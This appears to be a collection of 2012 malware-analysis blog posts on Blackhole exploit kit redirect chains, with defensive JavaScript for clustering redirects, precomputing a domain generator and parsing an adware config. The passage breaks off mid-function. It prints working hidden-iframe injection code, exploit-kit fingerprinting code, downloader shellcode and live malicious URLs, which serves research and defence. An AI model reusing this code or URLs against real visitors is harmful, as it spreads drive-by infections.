It begins with the infected hosting homepage at hxxp://dansenbijjansen.com/
It is a good, honest site. Sadly, it has suspicious code at hxxp://dansenbijjansen.com/foto/index.php?
I downloaded it to examine it and found the JS code below:
<script>el=document.createElement("div");try{a}catch(qq)
{el.appendChild(document.createElement("p"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el)
{appendChild(document.createTextNode("eva"));}}
k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we
Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44
c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32
c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104
c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76
c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....
↑This was easy to deobfuscate, and it yields the iframer below:
<iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'></iframe>
That made me check hxxp://tr2.4voip.biz/in.cgi?2, where I found
multiple malicious links, as in the code below:
↑The links above obviously exist to make sure users are
redirected to the HTML file below, which carries another JS code:
It leads us to the link: hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=
What is this? We have many references to it in urlquery, below:
This is actually a URL forwarder service used to redirect a request to some
other URL, for downloading or other purposes. I checked the recorded URLs
and found the query format looks like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio=7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
Or....
hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio=7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt=
In our case, a certain ticket (folio=7POYGN0G2) and
domain (dmn=4voip.biz) forwarded us to a special path on the 4voip.biz host.
Feel free to check and analyze further what you can get from that host.
The interesting part is that tr2.4voip.biz and fwdservice.com are in the
same network:
They share the same IP address with lame malicious domains like:
netsecur.com
wwwfaceboko.com
yourmoneybox.net
Blacklisting 4voip.biz and fwdservice.com would be a nice idea!
Friday, 31 August 2012






When I hunt the honeypot Blackhole exploit kit (BHEK) blacklist
for infections, I often see URLs ending in js.js.
The file always has the same extension, but its contents differ
depending on the malware epidemic / on how the BHEK operators want to
infect users at that time.
Previously, the trend I found in the js.js code was a mere
common injected obfuscation script like:
or
↑It was obvious that we had to crack this code to get to the next
hop of the malware source.
But the recent js.js files I found were mostly/practically a JavaScript call to
another text file containing a "document.location=" pointing to a certain Blackhole site.
The moral of this writing is that we can nail bigger stuff / a new epidemic by
understanding the parameters produced by the recent variants.
Allow me to demonstrate this theory. Let's look at the real infected URLs below:
209.215.118.13 hXXp://209.215.118.136/fFDrSXRM/js.js
200.219.245.75 hXXp://aainstalacoeseletricas.com.br/3XmimsHL/js.js
184.107.196.218 hXXp://www.celucentro.com.co/qgmZiWk7/js.js
82.98.87.89 hXXp://wilde.webprojekt.ch/v8bPW1U4/js.js
85.214.26.149 hXXp://advantage-media-sports.com/26MxXngr/js.js
194.170.160.46 hXXp://www.admirals.ae/mC9o9rRd/js.js
These will send you to a certain "document.location=" as below:
document・location='hXXp://209.59.222.20/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';
document・location='hXXp://50.116.54.37/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://173.230.130.248/pxyk80ujzb03h.php?y=078eb263358008ea';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=gawit01smae175m0';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';
The lesson teaches us to recognize the current parameter pattern used by
Blackhole, which is: /pxyk80ujzb03h.php?y=
Let's prove this theory by searching for the above string in the
Malware Domain List site:
↑Voila! We got ourselves a new hunting field. :-)
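As an added example (not code from the original post), here is the hunting step in script form: pull the "document.location=" target out of a batch of js.js bodies and group the targets by landing-page pattern (PHP file name plus the query key), which is exactly the string proposed above for grepping the Malware Domain List. The sample bodies are constructed from the six redirects quoted above, written in this blog's own defanged style (hXXp, "document・location"); refang() normalises both that and live code, so the same script runs over real js.js fetches.

```javascript
// Added example, not from the original post: extract and cluster js.js
// redirect targets. SAMPLE_JS_BODIES is constructed from the six redirects
// quoted in the post plus one harmless file; it is not captured content.

const SAMPLE_JS_BODIES = [
  "document・location='hXXp://209.59.222.20/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';",
  "document・location='hXXp://50.116.54.37/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';",
  "document・location='hXXp://173.230.130.248/pxyk80ujzb03h.php?y=078eb263358008ea';",
  "document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';",
  "document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=gawit01smae175m0';",
  "document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';",
  // constructed benign js.js, to show non-redirecting files are ignored
  "window.onload = function () { document.title = 'hello'; };",
];

// Undo the hXXp:// and "・" defanging so the parser also works on analyst notes.
function refang(text) {
  return text.replace(/h[xX]{2}p(s?):\/\//g, 'http$1://').replace(/・/g, '.');
}

// Every URL assigned to document.location (or document.location.href) in one body.
function extractRedirects(body) {
  const re = /document\s*\.\s*location(?:\s*\.\s*href)?\s*=\s*(['"])(.*?)\1/g;
  const text = refang(body);
  const targets = [];
  let m;
  while ((m = re.exec(text)) !== null) targets.push(m[2]);
  return targets;
}

// Landing pattern = path plus first query key, e.g. "/pxyk80ujzb03h.php?y=".
function landingPattern(url) {
  const u = new URL(url);
  const firstKey = [...u.searchParams.keys()][0];
  return firstKey === undefined ? u.pathname : `${u.pathname}?${firstKey}=`;
}

// { pattern: [sorted distinct hosts] } over a batch of js.js bodies.
function clusterByPattern(bodies) {
  const clusters = new Map();
  for (const body of bodies) {
    for (const target of extractRedirects(body)) {
      const key = landingPattern(target);
      if (!clusters.has(key)) clusters.set(key, new Set());
      clusters.get(key).add(new URL(target).host);
    }
  }
  const result = {};
  for (const [key, hosts] of clusters) result[key] = [...hosts].sort();
  return result;
}

console.log(JSON.stringify(clusterByPattern(SAMPLE_JS_BODIES), null, 2));
```

Each key of the result is a ready-made hunting string for the domain list, and the host list under it is the set of landing servers seen behind that pattern.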
PS: This post is dedicated to fellow malware hunters
#MalwareMustDie!


Lucky me, I just bumped into one; I thought it had already been wiped clean.
Here's the story of it.
I got the hint of the infected URL via spam caught by my own spam filter.
Here's the URL: hxxp://www.strow.es/proyectos/destacado.html
As usual, fetch it:
--03:48:46-- hxxp://www.strow.es/proyectos/destacado.html
=> `destacado.html'
Resolving www.strow.es... 212.59.199.22
Connecting to www.strow.es|212.59.199.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,808 (22K) [text/html]
100%[====================================>] 22,808 29.32K/s
03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]
Let's see the timestamp of it...
-rwx------ 1 r00t b33r 22808 Aug 8 02:29 destacado.html
↑Ah, an old infected file that got left over..
It is a common HTML file, nothing special except that it was injected with JavaScript;
the code came after the tag like below:
You can see the code in pastebin --->>>>[HERE]
This is actually pseudorandom-domain JS code; the eval() payload is below.
Of course it is not in the form it appears on the page, so you cannot run it just by pasting it.
function nextRandomNumber(){
  // Park-Miller style LCG (A=48271, M=2^31-1). Q = M / A is computed in
  // floating point, so hi and lo are not integers; that bug is part of the
  // algorithm and must be kept to reproduce the same domains.
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  if (test > 0){
    this.seed = test;
  }
  else {
    this.seed = test + this.M;
  }
  return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
  // Seeded only from the victim's local month, day of month and 3-hour slot,
  // so every infected browser in the same slot computes the same domain.
  var d = new Date(unix * 1000);
  var s = Math.ceil(d.getHours() / 3);
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) +
    (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
  // 16 letters drawn from a fixed alphabet, then the fixed TLD is appended.
  var rand = new RandomNumberGenerator(unix);
  var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}
setInterval(function (){
  // Retried every 100 ms until it succeeds once: build the domain for the
  // current time and inject a 0x0 hidden iframe pointing at <domain>/in.cgi?15
  // (hxxp is the blog's defanging of http).
  try {
    if (typeof iframeWasCreated == "undefined"){
      var unix = Math.round( + new Date()/ 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
      iframeWasCreated = true;
    }
  }
  catch (e){
    iframeWasCreated = undefined;
  }
}
, 100);
The paste of the code is here ===>>>>[HERE]
Well, this will lead you to the landing page below: hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15
↑But don't get upset, since nothing is there anymore ;-)
My point is for you to see what they code in pseudorandom fashion.
Read the code well and you will know how it works.
The stupid thing about using pseudorandom domains is that there are no "really" random URLs:
you have to leave something fixed to be merged into the URL.
For this sample it is easy to grep "/in.cgi?" and see what turns up in the Malware Domain List.
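The other thing the fixed parts buy a defender is precomputation. As an added example (not code from the original post), the generator is re-implemented below with the date parts it actually consumes (month 0-11, day of month, hour 0-23) taken as explicit inputs, so the domains a victim would contact on a given day can be listed ahead of time and blocked or sinkholed. Two observations drive the design: the seed only changes every three hours (Math.ceil(hour / 3) takes nine values per day, 0 through 8), and the original reads the victim's local clock, so a defender should run the enumeration for every time zone of interest rather than once in UTC. The Unix-timestamp wrapper here uses UTC getters on purpose, which is an assumption of this example and not what the sample does.

```javascript
// Added example, not from the original post: a clean port of the domain
// generator above for precomputing its domains. Arithmetic is kept bit-for-bit
// identical to the sample (including the non-integer Q = M / A), because any
// "fix" would produce different domains.

const LETTERS = 'buaxoqeriqwkgfkdyenzossqlxfqayvpr'.split('');

function makeGenerator(month, day, hour) {
  const slot = Math.ceil(hour / 3); // the seed changes only every 3 hours
  const g = {
    seed: 2345678901 + month * 0xFFFFFF + day * 0xFFFF + Math.round(slot * 0xFFF),
    A: 48271,
    M: 2147483647,
  };
  g.Q = g.M / g.A;          // float, exactly as in the sample
  g.R = g.M % g.A;
  g.oneOverM = 1.0 / g.M;
  g.next = function () {
    const hi = this.seed / this.Q;
    const lo = this.seed % this.Q;
    const t = this.A * lo - this.R * hi;
    this.seed = t > 0 ? t : t + this.M;
    return this.seed * this.oneOverM;
  };
  return g;
}

function randomInt(gen, min, max) {
  return Math.round((max - min) * gen.next() + min);
}

// Domain for one (month, day, hour) triple, e.g. dgaDomain(7, 8, 2) for Aug 8, 02:xx.
function dgaDomain(month, day, hour, length = 16, zone = 'ru') {
  const gen = makeGenerator(month, day, hour);
  let str = '';
  for (let i = 0; i < length; i++) {
    str += LETTERS[randomInt(gen, 0, LETTERS.length - 1)];
  }
  return `${str}.${zone}`;
}

// Same, driven by a Unix timestamp like the sample, but interpreted in UTC so the
// result does not depend on the analysis machine's time zone (example's choice).
function dgaDomainFromUnix(unix, zone = 'ru') {
  const d = new Date(unix * 1000);
  return dgaDomain(d.getUTCMonth(), d.getUTCDate(), d.getUTCHours(), 16, zone);
}

// Every distinct domain reachable on one calendar day: at most 9 (one per slot).
function dgaDomainsForDay(month, day, zone = 'ru') {
  const out = new Set();
  for (let hour = 0; hour < 24; hour++) out.add(dgaDomain(month, day, hour, 16, zone));
  return [...out];
}

// Aug 8 (month is 0-based), the date on the leftover file's timestamp.
console.log(dgaDomainsForDay(7, 8));
```

A whole year is therefore at most 12 x 31 x 9 domains per TLD, which is small enough to feed straight into a blocklist; the fixed "/in.cgi?15" path remains the cheaper grep for historical data.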


The dropped malware collection is in the pic below:
↑ As you can see, all of it is dated today; it is fresh. Don't worry, the samples are out there, grab them all.
This threat is so nasty that I think I need to blog it. Below is the report.
I believe some of you received or have seen mail like this:
Date: Tue, 28 Aug 2012 11:04:30 -0400
From: "Intuit Payroll Services"
Subject: QuickBooks Security Update
You will not be able to access your Intuit QuickBooks
without updated Intuit Security Tool (IST™) after 31th of August, 2012.
You can update Intuit Security Tool here.
After a successful download please run the setup for an automatic
installation, then login to Intuit Quickbooks online to check that
it is working properly.
This email was sent from an auto-notification system that
can't accept incoming email. Please don't reply to this message.
You have received this business communication as part of our efforts to fulfill
your request or service your account.
You may receive this and other business communications from us
even if you have opted out of marketing messages.
Terms, conditions, pricing, features, and service options are
subject to change. View our complete Terms of Service.
If you click the "terms and conditions" link you will reach the link below: hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html
After accessing the URL you will get the malicious index.html like below:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript"
src="hXXp://66.242.140.34/LA5S92vH/js.js"></script>
<script type="text/javascript"
src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script>
<script type="text/javascript" src="
hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script>
</html>
↑It is a not-good index.html; let's check it in VirusTotal:
MD5: 5d323254ee15f460a6bd6f7262cd3c42
File size: 327 bytes
File name: output.2145601.txt
File type: HTML
Tags: html
Detection ratio: 18 / 42
Analysis date: 2012-08-31 12:47:34 UTC
URL: [CLICK]
If you trace the three URLs written in that HTML,
they all lead you to the same JavaScript file. I traced them like this:
--00:27:31-- hXXp://66.242.140.34/LA5S92vH/js.js
=> `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:32 (2.72 MB/s) - `js.js' saved [78/78]
--00:27:40-- hXXp://freerobinfly.com/sS5N3rtK/js.js
=> `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]
--00:27:47-- hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
=> `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]
Let's see what's inside this js.js:
document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';
↑Another redirection. OK, this is no good either; let's check in VirusTotal again:
MD5: e2525763bdf95e9a33001fd231ee109e
File size: 78 bytes
File name: js.js
File type: Text
Detection ratio: 3 / 42
Analysis date: 2012-08-31 15:59:42 UTC ( 0 minutes ago )
URL: [CLICK]
↑OK, at least three antivirus products detect it.
Let's grab it too and see what's inside ↓
--00:29:18-- http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
=> `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 69,236 115.00K/s
00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]
And the inside is obfuscated code like this:
↑This is definitely not good at all; let's check it in VirusTotal first ↓
MD5: 643e431692f6ce0eaf4bb4bdb1e0ed4a
File size: 67.6 KB ( 69236 bytes )
File name: pxyk80ujzb03h.php@y=078eb263358008ea
File type: HTML
Detection ratio: 2 / 42
Analysis date: 2012-08-31 16:18:34 UTC ( 0 minutes ago )
URL: [CLICK]
Oh, it looks like I am the first who uploaded this sample.
Well, at least NOW two antivirus products detect it.
If you deobfuscate it right you will get the result below;
one part is this code:
document・write('<center>Waiting for redirect...</center>');
function end_redirect(){
window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';
}
And the other is a plugin detector in JavaScript:
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a) <etc etc>.....
It detects your OS:
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
It senses your browser user agent to pick the right drops:
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
Sensing the element into which it will install the mess in your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
And checking which browser you have:
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
Very interesting to know that this code is considering using Java against you:
DTK : {
$ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null,
Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA",
"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
"application/java-deployment-toolkit",
"application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled :
function (){
:
:
:
var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" +
(a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h ++ ){
d = f.JavaVersions[h];
n = "JavaPlugin." + d[0] + "" + d[1];
b = d[0] + "." + d[1] + ".";
for (l = d[2];
l >= 0; l -- ){
r = "JavaWebStart.isInstalled." + b + l + ".0";
if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO
Well, it's sophisticated, isn't it? The full deobfuscated code is here ====>>> [CLICK]
OK, let's get further. The deobfuscated code above also brings you the shellcode below:
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81
e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07
58 40 5c 5c 58 12 07 07 1d 18 06 19 19 1e 06 1c
1c 06 19 1f 1f 07 58 06 58 40 58 17 4e 15 18 19
1c 18 18 0e 4d 15 19 28 28 00
This leads you to download a file from: hxxp://50.116.44.177/p.php?f=01400&e=1
So we have two new download URLs that we can assume are payloads; let's check.
The first URL is:
--00:34:48-- hxxp://davidkellett.co.uk/updateflashplayer.exe
=> `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]
100%[====================================>] 371,112 72.82K/s ETA 00:00
00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]
In VirusTotal the score is 11/42:
MD5: 4c22e00d38a44b810f6103ec6837b137
File size: 362.4 KB ( 371112 bytes )
File name: updateflashplayer.exe
File type: Win32 EXE
Tags: peexe
Detection ratio:11 / 42
Analysis date: 2012-08-31 15:29:23 UTC ( 7 minutes ago )
URL: [CLICK]
↑It looks like Zbot. I am not an expert with naming stuff;
anyway, the malware details I wrote on the VirusTotal page..
The other drop goes to:
--00:36:20-- http://50.116.44.177/p.php?f=01400
=> `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]
100%[===================================> ] 177,576 147.57K/s
00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]
This is also bad stuff; in VirusTotal only 1 (one) vendor detected it.
MD5: 096a79434392461517907c6f62b27cd1
File size: 173.4 KB ( 177576 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe
Detection ratio:1 / 42
Analysis date: 2012-08-31 15:37:57 UTC ( 1 hour, 23 minutes ago )
URL: [URL]
↑It is a Trojan; it runs as a daemon/process, reads the keyboard & screen,
and worst of all it fakes a Microsoft binary with yesterday's compilation date.


Some MDL already informed about and published these URLs, so I have no reason to hold them anymore:
payloads:
(1)
hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
↑classical one
(2)
hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
                             ^^^^^^^^^^^^^^^^^^^^
↑Good trick, don't be fooled by index.html
(Information: this is actually an iframer leading to BHEK at the link below)
hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
↑Not the usual one, look at the parameter of the php file
(3)
hXXp://crane.co.th/YabymY6p/index.html
                  ^^^^^^^^^^^^^^^^^^^^
↑see the randomized subdir above?
Conclusion:
You can set up almost every infection scheme in the Blackhole interface,
yet the characteristics are still there.
Note:
This page is here because of the teamwork of malware researchers.
Thank you to those who contributed the content, to those who corrected and advised,
to those who read and share, and God & prayers bless those who take
direct action straight against these threats.
BTW, no, I am telling you #MalwareMustDie is not selling crap.


We ignored these guys for so long. We thought they would raise no threat. Now they are spreading "with" a good evil-distribution scheme (if I cannot call it infection).
Looking at the network they have built, Babylon is adware, yet it spreads like an exploit pack. We should raise market awareness of this trend; who knows, one day malware may come and ride on the Babylon scheme to become a new epidemic vector..
Please read the PoC below:
Analysis:
We snipped a research log and found the URL below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>> => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614 --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]
Got curious, so I looked inside. The file is UTF-16LE, which is why cat in an 8-bit console printed a stray glyph for the byte-order mark and a space after every character; it is shown here decoded:
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>> [Installer]
>> PublisherName="Premium"
>> ProductName="Setup"
>> ProductVersion="1.0"
>> ProductCode="{17EB6DDC-1522-72F9-D5AE-7B1FC1C487CE}"
>> PublisherID="0"
>> SourceID="0"
>> PageID="0"
>> AffiliateID="%Installer_AffiliateID%"
>> InstallerID="0"
>> VisitorID="0"
>> Locale="en"
>> Date="2012/08/31"
>> Time="3:23:06"
>> ShowInTaskbar="1"
>> HideScreens="0"
>> InstallerMode=""
>>
>> [Server]
>> ID="0"
>> Location="DE"
>>
>> [UserInfo]
>> GeoLocation="JP"
>> IPAddress="121.3.173.191"
>> WebBrowser="0"
>>
>> [RndGen]
>> Percentage="21"
>>
>>
>> [Screen75]
>> Title="Setup"
>> Button1="Yes"
>> Button2="&No"
>> Label1="Are you sure?"
>> :
>> :
>> etc
FYI, this server is serving Babylon adware and is spreading it either with its own "kinda" exploit
pack or using exploit-pack methods. So below is the conclusion:
1. The infector URL uses the exploit pack format.
2. It definitely logs PC information during installation via the browser and keeps a
snapshot of it on the server.
3. It backdoors the installer without the user's permission.
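As an added example (not code from the original post), here is how to read such a config programmatically rather than by eye: get_cfg.php returns a UTF-16LE text file with a byte-order mark, so the script detects the BOM, decodes, and parses the INI-style sections into an object from which the fields of interest (IP address, geolocation, locale, server location) can be pulled for a report. SAMPLE_CFG_TEXT is constructed from a subset of the values in the dump above and then re-encoded as UTF-16LE with a BOM to mimic the file on the wire; the parser and the field selection are the example's own.

```javascript
// Added example, not from the original post: decode a UTF-16LE (BOM-prefixed)
// installer config and parse its INI sections. The sample below is constructed
// from a subset of the dump in the post; it is not a captured file.

const SAMPLE_CFG_TEXT = [
  '[Installer]',
  'PublisherName="Premium"',
  'ProductName="Setup"',
  'ProductVersion="1.0"',
  'ProductCode="{17EB6DDC-1522-72F9-D5AE-7B1FC1C487CE}"',
  'AffiliateID="%Installer_AffiliateID%"',
  'Locale="en"',
  'Date="2012/08/31"',
  'Time="3:23:06"',
  'InstallerMode=""',
  '',
  '[Server]',
  'ID="0"',
  'Location="DE"',
  '',
  '[UserInfo]',
  'GeoLocation="JP"',
  'IPAddress="121.3.173.191"',
  'WebBrowser="0"',
  '',
  '[RndGen]',
  'Percentage="21"',
  '',
  '[Screen75]',
  'Title="Setup"',
  'Button1="Yes"',
  'Button2="&No"',
  'Label1="Are you sure?"',
].join('\r\n');

// Encode as UTF-16LE with a FF FE byte-order mark (what the server sends).
function encodeUtf16le(text) {
  const buf = new Uint8Array(2 + text.length * 2);
  buf[0] = 0xff;
  buf[1] = 0xfe;
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    buf[2 + 2 * i] = code & 0xff;
    buf[3 + 2 * i] = code >> 8;
  }
  return buf;
}

const SAMPLE_CFG_BYTES = encodeUtf16le(SAMPLE_CFG_TEXT);

// BOM-aware decode: UTF-16LE when FF FE leads, otherwise treat as UTF-8/ASCII.
function decodeConfig(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0xff && bytes[1] === 0xfe) {
    return new TextDecoder('utf-16le').decode(bytes.subarray(2));
  }
  return new TextDecoder('utf-8').decode(bytes);
}

// Minimal INI parser: { section: { key: value } }, surrounding quotes stripped.
function parseIni(text) {
  const cfg = {};
  let section = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(';')) continue;
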